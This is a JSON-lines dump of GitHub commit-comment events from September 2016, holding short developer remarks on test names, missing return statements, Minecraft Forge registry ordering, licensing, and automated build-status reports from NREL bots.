{"id":"4587345453","type":"CommitCommentEvent","actor":{"login":"mangeshb1"},"repo":{"name":"mangeshb1/CMPT733Big_Data_YELP"},"payload":{"comment":{"id":19090086,"position":null,"line":null,"path":null,"commit_id":"dfc44d03ac4f6a9e146b8f8e7b4a5aaca07d289b","created_at":"2016-09-20T04:01:13Z","updated_at":"2016-09-20T04:01:13Z","body":"Update for readme"}},"created_at":"2016-09-20T04:01:13Z"}
{"id":"4587348474","type":"CommitCommentEvent","actor":{"login":"Gurjit4800"},"repo":{"name":"Gurjit4800/Assignment-3"},"payload":{"comment":{"id":19090091,"position":null,"line":null,"path":null,"commit_id":"7db80b9c67e35ab4e74054d1d833fd55964e51a4","created_at":"2016-09-20T04:02:23Z","updated_at":"2016-09-20T04:02:23Z","body":"nn"}},"created_at":"2016-09-20T04:02:23Z"}
{"id":"4587350120","type":"CommitCommentEvent","actor":{"login":"thanhcs94"},"repo":{"name":"thanhcs94/RecyclerViewExpandable"},"payload":{"comment":{"id":19090094,"position":null,"line":null,"path":null,"commit_id":"36cb61e304abde34b8ebe2bea50f76ed09184a85","created_at":"2016-09-20T04:02:35Z","updated_at":"2016-09-20T04:02:35Z","body":"# ExpandableRecyclerView\r\n\r\nRecycler view adapter that adds expandable / collapsible items\r\n\r\n![image](https://media.giphy.com/media/AQhm8h8KLaxO/giphy.gif)"}},"created_at":"2016-09-20T04:02:35Z"}
{"id":"4587360702","type":"CommitCommentEvent","actor":{"login":"vishwakrishnamurthy"},"repo":{"name":"Kinvey/dlc-cli"},"payload":{"comment":{"id":19090127,"position":58,"line":217,"path":"test/datalink.coffee","commit_id":"1f85da996ceec8ad8984d4bcd0659b92461290fd","created_at":"2016-09-20T04:06:50Z","updated_at":"2016-09-20T04:06:50Z","body":"wrong test name"}},"created_at":"2016-09-20T04:06:50Z"}
{"id":"4587364304","type":"CommitCommentEvent","actor":{"login":"kukookoo"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19090141,"position":null,"line":null,"path":null,"commit_id":"08201a7ec33c56f163198baa65656779ea2082e2","created_at":"2016-09-20T04:08:21Z","updated_at":"2016-09-20T04:08:21Z","body":"Define로 N값을 정의하기보다 입력을받게 만들면 어떨까요"}},"created_at":"2016-09-20T04:08:21Z"}
{"id":"4587364364","type":"CommitCommentEvent","actor":{"login":"vishwakrishnamurthy"},"repo":{"name":"Kinvey/dlc-cli"},"payload":{"comment":{"id":19090143,"position":72,"line":231,"path":"test/datalink.coffee","commit_id":"1f85da996ceec8ad8984d4bcd0659b92461290fd","created_at":"2016-09-20T04:08:23Z","updated_at":"2016-09-20T04:08:23Z","body":"leftover .only. Please remove"}},"created_at":"2016-09-20T04:08:23Z"}
{"id":"4587367662","type":"CommitCommentEvent","actor":{"login":"Hiion"},"repo":{"name":"HYEJIN2013/JIN2013"},"payload":{"comment":{"id":19090152,"position":null,"line":null,"path":null,"commit_id":"5e76712fec7ae2db2fd4af911517552b1b798b25","created_at":"2016-09-20T04:09:45Z","updated_at":"2016-09-20T04:09:45Z","body":"return 문이 빠졌어요."}},"created_at":"2016-09-20T04:09:45Z"}
{"id":"4587368255","type":"CommitCommentEvent","actor":{"login":"Hiion"},"repo":{"name":"HYEJIN2013/JIN2013"},"payload":{"comment":{"id":19090158,"position":5,"line":5,"path":"main","commit_id":"5e76712fec7ae2db2fd4af911517552b1b798b25","created_at":"2016-09-20T04:09:59Z","updated_at":"2016-09-20T04:09:59Z","body":"return 0;\r\n}"}},"created_at":"2016-09-20T04:09:59Z"}
{"id":"4587369115","type":"CommitCommentEvent","actor":{"login":"Atcold"},"repo":{"name":"jhjin/triplet-criterion"},"payload":{"comment":{"id":19090160,"position":3,"line":3,"path":"TripletCriterion.cu","commit_id":"5323f705ada9265e709ca68d2caedba7cd398282","created_at":"2016-09-20T04:10:19Z","updated_at":"2016-09-20T04:10:19Z","body":"Oh, you compile `init.cu`, not this for per se.\r\nIn not yet able to understand Cmake... "}},"created_at":"2016-09-20T04:10:19Z"}
{"id":"4587373532","type":"CommitCommentEvent","actor":{"login":"joohyoengjin"},"repo":{"name":"joohyoengjin/joo815"},"payload":{"comment":{"id":19090171,"position":5,"line":5,"path":"main","commit_id":"5e76712fec7ae2db2fd4af911517552b1b798b25","created_at":"2016-09-20T04:12:10Z","updated_at":"2016-09-20T04:12:10Z","body":"R"}},"created_at":"2016-09-20T04:12:10Z"}
{"id":"4587373789","type":"CommitCommentEvent","actor":{"login":"joohyoengjin"},"repo":{"name":"joohyoengjin/joo815"},"payload":{"comment":{"id":19090173,"position":5,"line":5,"path":"main","commit_id":"5e76712fec7ae2db2fd4af911517552b1b798b25","created_at":"2016-09-20T04:12:16Z","updated_at":"2016-09-20T04:12:16Z","body":"R"}},"created_at":"2016-09-20T04:12:16Z"}
{"id":"4587374431","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19090176,"position":null,"line":null,"path":null,"commit_id":"056b267146b2368e483ebbe2caadd52fff6c1aa5","created_at":"2016-09-20T04:12:32Z","updated_at":"2016-09-20T04:12:32Z","body":"@evanweaver can you make sure this makes the next OS package you build?  This swaps out the E+ build for a release one thanks to @nmerket "}},"created_at":"2016-09-20T04:12:32Z"}
{"id":"4587379672","type":"CommitCommentEvent","actor":{"login":"kukookoo"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19090187,"position":null,"line":null,"path":null,"commit_id":"d927573d368619704ec4b4000c3fc0d940d03b65","created_at":"2016-09-20T04:14:41Z","updated_at":"2016-09-20T04:14:41Z","body":"버블배열 코드입니다."}},"created_at":"2016-09-20T04:14:41Z"}
{"id":"4587380742","type":"CommitCommentEvent","actor":{"login":"Hiion"},"repo":{"name":"Hiion/JIN2013"},"payload":{"comment":{"id":19090189,"position":null,"line":null,"path":null,"commit_id":"5e76712fec7ae2db2fd4af911517552b1b798b25","created_at":"2016-09-20T04:15:09Z","updated_at":"2016-09-20T04:15:09Z","body":"return 이 빠졌어요."}},"created_at":"2016-09-20T04:15:09Z"}
{"id":"4587381866","type":"CommitCommentEvent","actor":{"login":"Hiion"},"repo":{"name":"Hiion/JIN2013"},"payload":{"comment":{"id":19090191,"position":5,"line":5,"path":"main","commit_id":"5e76712fec7ae2db2fd4af911517552b1b798b25","created_at":"2016-09-20T04:15:36Z","updated_at":"2016-09-20T04:15:36Z","body":"return 0;\r\n}"}},"created_at":"2016-09-20T04:15:36Z"}
{"id":"4587382376","type":"CommitCommentEvent","actor":{"login":"ravinderk"},"repo":{"name":"ravinderk/Give"},"payload":{"comment":{"id":19090192,"position":null,"line":null,"path":null,"commit_id":"033d59a6625f0d3926d89d207c89a4ee380ce29a","created_at":"2016-09-20T04:15:50Z","updated_at":"2016-09-20T04:15:50Z","body":"@DevinWalker Yes, This will work with zapier also. Let me know if you found any issue in testing."}},"created_at":"2016-09-20T04:15:50Z"}
{"id":"4587387741","type":"CommitCommentEvent","actor":{"login":"jeffh"},"repo":{"name":"Quick/Nimble"},"payload":{"comment":{"id":19090207,"position":1,"line":1,"path":".ruby-version","commit_id":"ddbb7e68830be5cfdf01c1bd99e704b98e68ce51","created_at":"2016-09-20T04:18:07Z","updated_at":"2016-09-20T04:18:07Z","body":"Hey @ashfurrow, is this needed for CI? I don't to touch system ruby at all to prevent keep package installers  from having issues."}},"created_at":"2016-09-20T04:18:07Z"}
{"id":"4587391318","type":"CommitCommentEvent","actor":{"login":"mbalvi"},"repo":{"name":"mbalvi/Firstgithub"},"payload":{"comment":{"id":19090217,"position":1,"line":1,"path":"README.md","commit_id":"fb67e5a7effee98029f2d1926e2491a852aabc9e","created_at":"2016-09-20T04:19:36Z","updated_at":"2016-09-20T04:19:36Z","body":"making changes here...."}},"created_at":"2016-09-20T04:19:36Z"}
{"id":"4587400185","type":"CommitCommentEvent","actor":{"login":"asmcpluss"},"repo":{"name":"asmcpluss/share-project"},"payload":{"comment":{"id":19090235,"position":null,"line":null,"path":null,"commit_id":"9f3533cb8654a32bd73ea0fbee0ac72fc9514b46","created_at":"2016-09-20T04:23:22Z","updated_at":"2016-09-20T04:23:22Z","body":"java: turn P(x,y) to hilbert value,vice versa"}},"created_at":"2016-09-20T04:23:22Z"}
{"id":"4587404841","type":"CommitCommentEvent","actor":{"login":"abhyudSree"},"repo":{"name":"abhyudSree/hello-world"},"payload":{"comment":{"id":19090248,"position":null,"line":null,"path":null,"commit_id":"f0660c94d01d90f4330010af89e2dd78ca59bdaa","created_at":"2016-09-20T04:25:26Z","updated_at":"2016-09-20T04:25:26Z","body":"dw"}},"created_at":"2016-09-20T04:25:26Z"}
{"id":"4587405731","type":"CommitCommentEvent","actor":{"login":"twe4ked"},"repo":{"name":"envato/jwt_signed_request"},"payload":{"comment":{"id":19090251,"position":null,"line":null,"path":null,"commit_id":"b30cdcb3b0c3b7c894663f0d82732de7401b9544","created_at":"2016-09-20T04:25:47Z","updated_at":"2016-09-20T04:25:47Z","body":"🎉 "}},"created_at":"2016-09-20T04:25:47Z"}
{"id":"4587406364","type":"CommitCommentEvent","actor":{"login":"RANKSHANK"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":19090254,"position":37,"line":83,"path":"src/main/java/net/minecraftforge/fml/common/registry/PersistentRegistryManager.java","commit_id":"7a843760444f99743dc07cdc99cf364f23398e74","created_at":"2016-09-20T04:26:04Z","updated_at":"2016-09-20T04:26:04Z","body":"Shouldn't Register\\<SoundEvent> be included in the initial event firing? Given that SoundEvents are often used in chained constructors, it'd probably need to be fired before Register\\<Block>.\r\n\r\nI can see this as being a future issue with something like FAIL, where a block's sounds would be pulled from the registry as opposed to object references during construction."}},"created_at":"2016-09-20T04:26:04Z"}
{"id":"4587408070","type":"CommitCommentEvent","actor":{"login":"sanchayitam"},"repo":{"name":"sanchayitam/Project-6-Go-Ubiquitous"},"payload":{"comment":{"id":19090255,"position":null,"line":null,"path":null,"commit_id":"faac1156b05159599adaf1ca16a93bff1e8c5ae0","created_at":"2016-09-20T04:26:52Z","updated_at":"2016-09-20T04:26:52Z","body":"Implemented Android Wear Code"}},"created_at":"2016-09-20T04:26:52Z"}
{"id":"4587413817","type":"CommitCommentEvent","actor":{"login":"joohyoengjin"},"repo":{"name":"HYEJIN2013/WhiteP"},"payload":{"comment":{"id":19090261,"position":null,"line":null,"path":null,"commit_id":"5e76712fec7ae2db2fd4af911517552b1b798b25","created_at":"2016-09-20T04:29:25Z","updated_at":"2016-09-20T04:29:25Z","body":"확인"}},"created_at":"2016-09-20T04:29:25Z"}
{"id":"4587414525","type":"CommitCommentEvent","actor":{"login":"hyungtaecf"},"repo":{"name":"hyungtaecf/BlueHouseProject"},"payload":{"comment":{"id":19090263,"position":null,"line":null,"path":null,"commit_id":"9344c2487d8b3feffc9fd34653dbddef9e69858c","created_at":"2016-09-20T04:29:45Z","updated_at":"2016-09-20T04:29:45Z","body":"hans0209 / counting_sort.cpp 에게서 복사했는데 작동 위해 포함할 게 뭐죠?"}},"created_at":"2016-09-20T04:29:45Z"}
{"id":"4587418089","type":"CommitCommentEvent","actor":{"login":"BSTUNO"},"repo":{"name":"BSTUNO/BSTUNO.github.io"},"payload":{"comment":{"id":19090277,"position":null,"line":null,"path":null,"commit_id":"895b2fdeab4c30ae57ce247f01d928217ebb32bf","created_at":"2016-09-20T04:31:14Z","updated_at":"2016-09-20T04:31:14Z","body":"test\r\n"}},"created_at":"2016-09-20T04:31:14Z"}
{"id":"4587418760","type":"CommitCommentEvent","actor":{"login":"BSTUNO"},"repo":{"name":"BSTUNO/BSTUNO.github.io"},"payload":{"comment":{"id":19090281,"position":2,"line":2,"path":".gitignore","commit_id":"895b2fdeab4c30ae57ce247f01d928217ebb32bf","created_at":"2016-09-20T04:31:31Z","updated_at":"2016-09-20T04:31:31Z","body":"d"}},"created_at":"2016-09-20T04:31:31Z"}
{"id":"4587421212","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19090291,"position":null,"line":null,"path":null,"commit_id":"1ad365fd035bbc7ad13dc97986694fa8342a334e","created_at":"2016-09-20T04:32:36Z","updated_at":"2016-09-20T04:32:36Z","body":"5665-coincident-plant-bug (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T04:32:36Z"}
{"id":"4587421386","type":"CommitCommentEvent","actor":{"login":"ichiren1"},"repo":{"name":"ichiren1/elasticsearch"},"payload":{"comment":{"id":19090294,"position":5,"line":89,"path":"core/src/test/java/org/elasticsearch/search/basic/TransportSearchFailuresIT.java","commit_id":"4641254ea60b712fd323a536692acbd79abddd81","created_at":"2016-09-20T04:32:40Z","updated_at":"2016-09-20T04:32:40Z","body":"found\r\n"}},"created_at":"2016-09-20T04:32:40Z"}
{"id":"4587421880","type":"CommitCommentEvent","actor":{"login":"paly2"},"repo":{"name":"paly2/Mynetest-server"},"payload":{"comment":{"id":19090307,"position":null,"line":null,"path":null,"commit_id":"e2c8059d781a6eb62682ade008deccfff1da8238","created_at":"2016-09-20T04:32:53Z","updated_at":"2016-09-20T04:32:53Z","body":"Bonne idée, mais il faut déplacer ces registrations vers le mod misc, afin de pouvoir faire de maptools un submodule :-)"}},"created_at":"2016-09-20T04:32:53Z"}
{"id":"4587422308","type":"CommitCommentEvent","actor":{"login":"ichiren1"},"repo":{"name":"ichiren1/elasticsearch"},"payload":{"comment":{"id":19090308,"position":5,"line":89,"path":"core/src/test/java/org/elasticsearch/indices/settings/UpdateNumberOfReplicasIT.java","commit_id":"4641254ea60b712fd323a536692acbd79abddd81","created_at":"2016-09-20T04:33:04Z","updated_at":"2016-09-20T04:33:04Z","body":"found\r\n"}},"created_at":"2016-09-20T04:33:04Z"}
{"id":"4587422690","type":"CommitCommentEvent","actor":{"login":"popoosl"},"repo":{"name":"popoosl/hello_app"},"payload":{"comment":{"id":19090310,"position":null,"line":null,"path":null,"commit_id":"a846bfce7280fd56e9cac15d62fd2143ed298421","created_at":"2016-09-20T04:33:15Z","updated_at":"2016-09-20T04:33:15Z","body":"initial commit readme"}},"created_at":"2016-09-20T04:33:15Z"}
{"id":"4587423497","type":"CommitCommentEvent","actor":{"login":"ichiren1"},"repo":{"name":"ichiren1/elasticsearch"},"payload":{"comment":{"id":19090319,"position":14,"line":107,"path":"core/src/test/java/org/elasticsearch/indices/settings/UpdateNumberOfReplicasIT.java","commit_id":"4641254ea60b712fd323a536692acbd79abddd81","created_at":"2016-09-20T04:33:39Z","updated_at":"2016-09-20T04:33:39Z","body":"found\r\n"}},"created_at":"2016-09-20T04:33:39Z"}
{"id":"4587424318","type":"CommitCommentEvent","actor":{"login":"ichiren1"},"repo":{"name":"ichiren1/elasticsearch"},"payload":{"comment":{"id":19090322,"position":20,"line":409,"path":"core/src/test/java/org/elasticsearch/tribe/TribeIT.java","commit_id":"4641254ea60b712fd323a536692acbd79abddd81","created_at":"2016-09-20T04:34:00Z","updated_at":"2016-09-20T04:34:00Z","body":"found\r\n"}},"created_at":"2016-09-20T04:34:00Z"}
{"id":"4587424885","type":"CommitCommentEvent","actor":{"login":"Racinettee"},"repo":{"name":"XCVG/collapsar"},"payload":{"comment":{"id":19090325,"position":36,"line":36,"path":"release/js/x_audio.js","commit_id":"9cb83e74af6ce7fd0d267f4efa75bf52f966d6ce","created_at":"2016-09-20T04:34:15Z","updated_at":"2016-09-20T04:34:15Z","body":"Yolo"}},"created_at":"2016-09-20T04:34:15Z"}
{"id":"4587425039","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19090326,"position":null,"line":null,"path":null,"commit_id":"8cfc43ed51da94fac8a535820acc8fa8a39e52c2","created_at":"2016-09-20T04:34:20Z","updated_at":"2016-09-20T04:34:20Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2293 of 2475 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8cfc43ed51da94fac8a535820acc8fa8a39e52c2-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8cfc43ed51da94fac8a535820acc8fa8a39e52c2-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.65%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T04:34:20Z"}
{"id":"4587426189","type":"CommitCommentEvent","actor":{"login":"joohyoengjin"},"repo":{"name":"HYEJIN2013/WhiteP"},"payload":{"comment":{"id":19090335,"position":4,"line":4,"path":"main","commit_id":"5e76712fec7ae2db2fd4af911517552b1b798b25","created_at":"2016-09-20T04:34:48Z","updated_at":"2016-09-20T04:34:48Z","body":"{"}},"created_at":"2016-09-20T04:34:48Z"}
{"id":"4587426322","type":"CommitCommentEvent","actor":{"login":"ichiren1"},"repo":{"name":"ichiren1/elasticsearch"},"payload":{"comment":{"id":19090337,"position":5,"line":96,"path":"core/src/test/java/org/elasticsearch/indexlifecycle/IndexLifecycleActionIT.java","commit_id":"4641254ea60b712fd323a536692acbd79abddd81","created_at":"2016-09-20T04:34:51Z","updated_at":"2016-09-20T04:34:51Z","body":"found\r\n"}},"created_at":"2016-09-20T04:34:51Z"}
{"id":"4587426533","type":"CommitCommentEvent","actor":{"login":"ichiren1"},"repo":{"name":"ichiren1/elasticsearch"},"payload":{"comment":{"id":19090339,"position":14,"line":133,"path":"core/src/test/java/org/elasticsearch/indexlifecycle/IndexLifecycleActionIT.java","commit_id":"4641254ea60b712fd323a536692acbd79abddd81","created_at":"2016-09-20T04:34:57Z","updated_at":"2016-09-20T04:34:57Z","body":"found\r\n"}},"created_at":"2016-09-20T04:34:57Z"}
{"id":"4587426783","type":"CommitCommentEvent","actor":{"login":"ichiren1"},"repo":{"name":"ichiren1/elasticsearch"},"payload":{"comment":{"id":19090340,"position":23,"line":174,"path":"core/src/test/java/org/elasticsearch/indexlifecycle/IndexLifecycleActionIT.java","commit_id":"4641254ea60b712fd323a536692acbd79abddd81","created_at":"2016-09-20T04:35:04Z","updated_at":"2016-09-20T04:35:04Z","body":"found"}},"created_at":"2016-09-20T04:35:04Z"}
{"id":"4587427569","type":"CommitCommentEvent","actor":{"login":"mcori"},"repo":{"name":"mcori/vPlatform"},"payload":{"comment":{"id":19090343,"position":2,"line":2,"path":"LICENSE","commit_id":"a461adf0fda1869d0530420b0ed9002a0a733895","created_at":"2016-09-20T04:35:24Z","updated_at":"2016-09-20T04:35:24Z","body":"The vPlatform is dual-licensed, available under both commercial and open-source licenses. The commercial license is recommended option for non-open source projects.\r\nThe primary open-source license is the GNU Lesser General Public License v. 3 (“LGPL”). In addition to LGPL, the vPlatform and tools are available under commercial license terms from Mikhail Korneev. "}},"created_at":"2016-09-20T04:35:24Z"}
{"id":"4587427741","type":"CommitCommentEvent","actor":{"login":"ichiren1"},"repo":{"name":"ichiren1/elasticsearch"},"payload":{"comment":{"id":19090344,"position":5,"line":179,"path":"core/src/test/java/org/elasticsearch/index/store/CorruptedFileIT.java","commit_id":"4641254ea60b712fd323a536692acbd79abddd81","created_at":"2016-09-20T04:35:27Z","updated_at":"2016-09-20T04:35:27Z","body":"found\r\n"}},"created_at":"2016-09-20T04:35:27Z"}
{"id":"4587428048","type":"CommitCommentEvent","actor":{"login":"hyungtaecf"},"repo":{"name":"hyungtaecf/BlueHouseProject"},"payload":{"comment":{"id":19090347,"position":null,"line":null,"path":null,"commit_id":"08201a7ec33c56f163198baa65656779ea2082e2","created_at":"2016-09-20T04:35:36Z","updated_at":"2016-09-20T04:35:36Z","body":"printf 하나도 없어서 저음에 어떻게 해야될지 모르니까 복잡해요."}},"created_at":"2016-09-20T04:35:36Z"}
{"id":"4587428800","type":"CommitCommentEvent","actor":{"login":"ichiren1"},"repo":{"name":"ichiren1/elasticsearch"},"payload":{"comment":{"id":19090351,"position":5,"line":876,"path":"test/framework/src/main/java/org/elasticsearch/test/ESIntegTestCase.java","commit_id":"4641254ea60b712fd323a536692acbd79abddd81","created_at":"2016-09-20T04:35:58Z","updated_at":"2016-09-20T04:35:58Z","body":"found"}},"created_at":"2016-09-20T04:35:58Z"}
{"id":"4587429713","type":"CommitCommentEvent","actor":{"login":"petergaultney"},"repo":{"name":"kyranf/robotarmyfactorio"},"payload":{"comment":{"id":19090354,"position":null,"line":null,"path":null,"commit_id":"6ba745f0ae0a2803413606e0b13f13c4789636de","created_at":"2016-09-20T04:36:20Z","updated_at":"2016-09-20T04:36:20Z","body":"awesome - thanks for figuring this one out. I think I'm starting to see how some of this code works. It's helpful to me to connect examples of its usage with the code itself."}},"created_at":"2016-09-20T04:36:20Z"}
{"id":"4587429819","type":"CommitCommentEvent","actor":{"login":"ichiren1"},"repo":{"name":"ichiren1/elasticsearch"},"payload":{"comment":{"id":19090355,"position":21,"line":260,"path":"test/framework/src/main/java/org/elasticsearch/test/ESSingleNodeTestCase.java","commit_id":"4641254ea60b712fd323a536692acbd79abddd81","created_at":"2016-09-20T04:36:25Z","updated_at":"2016-09-20T04:36:25Z","body":"found\r\n"}},"created_at":"2016-09-20T04:36:25Z"}
{"id":"4587430092","type":"CommitCommentEvent","actor":{"login":"ichiren1"},"repo":{"name":"ichiren1/elasticsearch"},"payload":{"comment":{"id":19090357,"position":30,"line":303,"path":"test/framework/src/main/java/org/elasticsearch/test/ESSingleNodeTestCase.java","commit_id":"4641254ea60b712fd323a536692acbd79abddd81","created_at":"2016-09-20T04:36:32Z","updated_at":"2016-09-20T04:36:32Z","body":"found"}},"created_at":"2016-09-20T04:36:32Z"}
{"id":"4587430147","type":"CommitCommentEvent","actor":{"login":"theFool32"},"repo":{"name":"theFool32/163OpenCourse_playbackRate"},"payload":{"comment":{"id":19090358,"position":null,"line":null,"path":null,"commit_id":"52fa2944a2c21ced97476316276a3ba63f5fc48e","created_at":"2016-09-20T04:36:34Z","updated_at":"2016-09-20T04:36:34Z","body":"issue #2 "}},"created_at":"2016-09-20T04:36:34Z"}
{"id":"4587430600","type":"CommitCommentEvent","actor":{"login":"Trafalgar-Square"},"repo":{"name":"Taker18/android_device_htc_pme"},"payload":{"comment":{"id":19090360,"position":null,"line":null,"path":null,"commit_id":"dc387b9262f04818eb0557f794e6fd6f40b87a13","created_at":"2016-09-20T04:36:44Z","updated_at":"2016-09-20T04:36:44Z","body":"This is a kang of the following commit:\r\nhttp://review.cyanogenmod.org/#/c/159448/"}},"created_at":"2016-09-20T04:36:44Z"}
{"id":"4587431614","type":"CommitCommentEvent","actor":{"login":"soulgalore"},"repo":{"name":"sitespeedio/browsertime"},"payload":{"comment":{"id":19090366,"position":null,"line":null,"path":null,"commit_id":"0e07d8ca1d2c17ce09432f8ec016d5b572c3eba9","created_at":"2016-09-20T04:37:08Z","updated_at":"2016-09-20T04:37:08Z","body":"I think it's better to just swallow until we fixed Browsertime so we return errors in the JSON. The problem is the HAR Export trigger and having it like this and continuously testing a site, makes the test data unstable (we still fetch a lot of interesting data running the coach)."}},"created_at":"2016-09-20T04:37:08Z"}
{"id":"4587432047","type":"CommitCommentEvent","actor":{"login":"wilsonrector"},"repo":{"name":"victoriafung/bloc-jams"},"payload":{"comment":{"id":19090367,"position":11,"line":86,"path":"scripts/album.js","commit_id":"3542f3d386922317a93cd160f8a34b7e7cc2777a","created_at":"2016-09-20T04:37:18Z","updated_at":"2016-09-20T04:37:18Z","body":"Careful of weird tabbing/formatting!"}},"created_at":"2016-09-20T04:37:18Z"}
{"id":"4587433763","type":"CommitCommentEvent","actor":{"login":"wongzigii"},"repo":{"name":"Quick/Nimble"},"payload":{"comment":{"id":19090370,"position":1,"line":1,"path":".ruby-version","commit_id":"ddbb7e68830be5cfdf01c1bd99e704b98e68ce51","created_at":"2016-09-20T04:38:03Z","updated_at":"2016-09-20T04:38:03Z","body":"Probably relate to https://github.com/travis-ci/travis-ci/issues/1984"}},"created_at":"2016-09-20T04:38:03Z"}
{"id":"4587434766","type":"CommitCommentEvent","actor":{"login":"LexManos"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":19090373,"position":37,"line":83,"path":"src/main/java/net/minecraftforge/fml/common/registry/PersistentRegistryManager.java","commit_id":"7a843760444f99743dc07cdc99cf364f23398e74","created_at":"2016-09-20T04:38:31Z","updated_at":"2016-09-20T04:38:31Z","body":"No, If you write your code in such a way that you need your value from one registery before that event is fired, then just store it locally until you need it. We are not going to writing a sorting system for the registries for every possible combination of how people write their code."}},"created_at":"2016-09-20T04:38:31Z"}
{"id":"4587435164","type":"CommitCommentEvent","actor":{"login":"seungwoogoh"},"repo":{"name":"Chunsjun/OnePiece"},"payload":{"comment":{"id":19090374,"position":null,"line":null,"path":null,"commit_id":"e965a723788ff69825e09a2262a66f21d37239a3","created_at":"2016-09-20T04:38:43Z","updated_at":"2016-09-20T04:38:43Z","body":"예얍~"}},"created_at":"2016-09-20T04:38:43Z"}
{"id":"4587435904","type":"CommitCommentEvent","actor":{"login":"yeahwu"},"repo":{"name":"XX-net/XX-Net"},"payload":{"comment":{"id":19090379,"position":null,"line":null,"path":null,"commit_id":"ae7fd8d252f941e6db575593381d3cd3c5288806","created_at":"2016-09-20T04:39:02Z","updated_at":"2016-09-20T04:39:02Z","body":"你终于出现了，呵呵"}},"created_at":"2016-09-20T04:39:02Z"}
{"id":"4587436689","type":"CommitCommentEvent","actor":{"login":"TEC10101"},"repo":{"name":"TEC10101/Portfolio"},"payload":{"comment":{"id":19090382,"position":null,"line":null,"path":null,"commit_id":"0c1ca68b538a17d1a8e79bf67e1cc0d6ad7d8297","created_at":"2016-09-20T04:39:23Z","updated_at":"2016-09-20T04:39:23Z","body":"File dump from the git CLI for Windows, Student-PC"}},"created_at":"2016-09-20T04:39:23Z"}
{"id":"4587437327","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19090385,"position":null,"line":null,"path":null,"commit_id":"8cfc43ed51da94fac8a535820acc8fa8a39e52c2","created_at":"2016-09-20T04:39:40Z","updated_at":"2016-09-20T04:39:40Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8cfc43ed51da94fac8a535820acc8fa8a39e52c2-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-20T04:39:40Z"}
{"id":"4587438553","type":"CommitCommentEvent","actor":{"login":"S-mardii"},"repo":{"name":"OpenDevelopmentMekong/wp-odm_theme"},"payload":{"comment":{"id":19090387,"position":4,"line":6,"path":"less/_layout.less","commit_id":"2a827de32175a95ac65a4e8adcceb4dbc4d98298","created_at":"2016-09-20T04:40:13Z","updated_at":"2016-09-20T04:40:13Z","body":"This CSS words between any two letters which make words become no meaning and wrong spelling.\r\n\r\nhttp://www.w3schools.com/cssref/css3_pr_word-break.asp"}},"created_at":"2016-09-20T04:40:13Z"}
{"id":"4587439462","type":"CommitCommentEvent","actor":{"login":"Chunsjun"},"repo":{"name":"Chunsjun/OnePiece"},"payload":{"comment":{"id":19090392,"position":null,"line":null,"path":null,"commit_id":"0650a9f13e92eeefc2814f783034353028538d54","created_at":"2016-09-20T04:40:36Z","updated_at":"2016-09-20T04:40:36Z","body":"자바 쥬아요~"}},"created_at":"2016-09-20T04:40:36Z"}
{"id":"4587439636","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":19090393,"position":null,"line":null,"path":null,"commit_id":"b78fbbce9e78b1275806cd43005dde568fca4c59","created_at":"2016-09-20T04:40:40Z","updated_at":"2016-09-20T04:40:40Z","body":"This update is perhaps causing crash:\r\n```!c++\r\nif (tile && tile->hasProperty(BLOCKSOLID)) {\r\n   return false;\r\n}\r\n```"}},"created_at":"2016-09-20T04:40:40Z"}
